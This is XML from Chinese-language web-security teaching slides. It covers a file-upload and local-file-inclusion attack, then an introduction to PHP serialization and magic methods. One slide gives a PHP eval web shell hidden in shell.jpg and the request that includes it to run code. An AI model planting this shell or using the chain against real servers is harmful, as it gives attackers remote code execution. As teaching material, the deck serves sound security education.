                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第一步：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>upload.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1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kern="100" dirty="0" smtClean="0">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50000"/>
              </a:lnSpc>
            </a:pP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php</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eval</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($_GET['pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>']);?&gt;</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第二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>步：访问</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http://127.0.0.1/a.php?page=up/shell.jpg&amp;pass=phpinfo();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="1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2324919" y="4528085"/>
            <a:ext cx="9072711" cy="2350332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="859477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2828975" y="2929344"/>
            <a:ext cx="8639372" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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知识点二：反序列化漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="727601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596727" y="875216"/>
            <a:ext cx="4392488" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="4022902"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3000896" y="396035"/>
              <a:ext cx="508859" cy="2522251"/>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1928801" y="1402731"/>
              <a:ext cx="3514207"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序列化与反序列化</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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="3345740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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序列化是指将对象、数组等数据结构转化为可以储存的格式的过程</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。程序在运行时，变量的值都是储存在内容中的，程序运行结束，操作系统就会将内存空间收回，</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要想要将内存中的变量写入磁盘中或是通过网络传输，就需要对其进行序列化操作，序列化能将一个对象转换成一个字符串</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中，序列化后的字符串保存了对象所有的变量，但是不会保存对象的方法，只会保存类的名字。</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java</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python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等编程语言都有各自的序列化的机制。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D6AEAB04-9B54-4899-92BA-29BCBCAE5C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6768" y="4984477"/>
            <a:ext cx="5385214" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481700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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="519982"/>
            <a:ext cx="10297144" cy="720080"/>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000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>类的对象，并将其序列化后保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>serialize.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中并打印到屏幕上。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF644E90-D856-4FCD-B616-F866C815904E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3931117092"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5328592"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5328592">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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b="1" kern="1200" dirty="0" err="1"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serialize.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0" err="1"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php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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000" b="1" kern="1200" dirty="0"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class example{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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private $message='hello world';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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public function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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set_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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($message){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$this-&gt;message=$message;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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public function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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show_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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echo $this-&gt;message;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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$object = new example();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$serialized = serialize($object);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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file_put_contents</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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('serialize.txt', $serialized);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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echo $serialized; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86402" marR="86402" marT="43201" marB="43201">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>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2484050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1100782" y="1240061"/>
            <a:ext cx="10369153" cy="394996"/>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上述代码运行的结果为：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形: 圆角 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AC0F91AE-3150-4A4F-BE5C-5BD47F5BEB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820863" y="4048373"/>
            <a:ext cx="9000999" cy="2088232"/>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代表储存的是对象</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(object)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7</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代表类名有</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7</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个字符，</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example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代表类名，</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代表对象中变量个数，</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表示字符串，</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16</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，代表长度，</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example message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是类名及变量名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3233CB65-8DF4-4AE6-ADAC-1A3E9148236A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2180903" y="2525604"/>
            <a:ext cx="9407946" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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O:7:"example":1:{s:16:" example message";s:11:"hello world";}</a:t>
            </a:r>
            <a:endPar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710958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 grpId="0" animBg="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="519982"/>
            <a:ext cx="10297144" cy="720080"/>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000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将序列化后的字符串恢复为数据结构的过程就叫做反序列化。为了能够反序列化一个对象，这个对象的类在执行反序列化的操作前必须已经定义过。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF644E90-D856-4FCD-B616-F866C815904E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="504877045"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1316807" y="1312069"/>
          <a:ext cx="10153128" cy="5040560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10153128">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5040560">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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b="1" kern="1200" dirty="0" err="1"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unserialize.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0" err="1"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php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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000" b="1" kern="1200" dirty="0"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class example{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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private $message='hello world';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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public function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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set_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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($message){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$this-&gt;message=$message;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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public function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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show_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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echo $this-&gt;message;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0"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$serialized = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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file_get_contents</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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("serialize.txt");</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$object = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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unserialize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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($serialized);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$object-&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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set_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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b="1" kern="1200" dirty="0" err="1"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unserialized</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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success');</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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$object-&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0" err="1"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show_message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"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sz="2000" b="1" kern="1200" dirty="0" smtClean="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?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86402" marR="86402" marT="43201" marB="43201">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="6496645"/>
            <a:ext cx="10369153" cy="394996"/>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上述代码执行完后会在屏幕上打印“</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unserialized</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success”</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1511623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596727" y="875216"/>
            <a:ext cx="4392488" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="4022902"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3000896" y="396035"/>
              <a:ext cx="508859" cy="2522251"/>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1928801" y="1402731"/>
              <a:ext cx="3514207"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en-US" altLang="zh-CN"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PHP</a:t>
              </a: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魔术方法</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2</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sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="1195215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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有一类特殊的方法，它们以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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__(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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两个下划线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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开头，在特定的条件下会被调用，例如类的构造方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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__construct()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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，它在实例化类的时候会被调用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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下面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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中常见的一些魔术方法。</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477490278"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1192806" y="2633178"/>
          <a:ext cx="10229028" cy="4389120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="4032448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__construct()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，类的构造函数，创建新的对象时会被调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__destruct()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，类的析构函数，当对象被销毁时会被调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__call()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，在对象中调用一个不可访问方法时会被调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
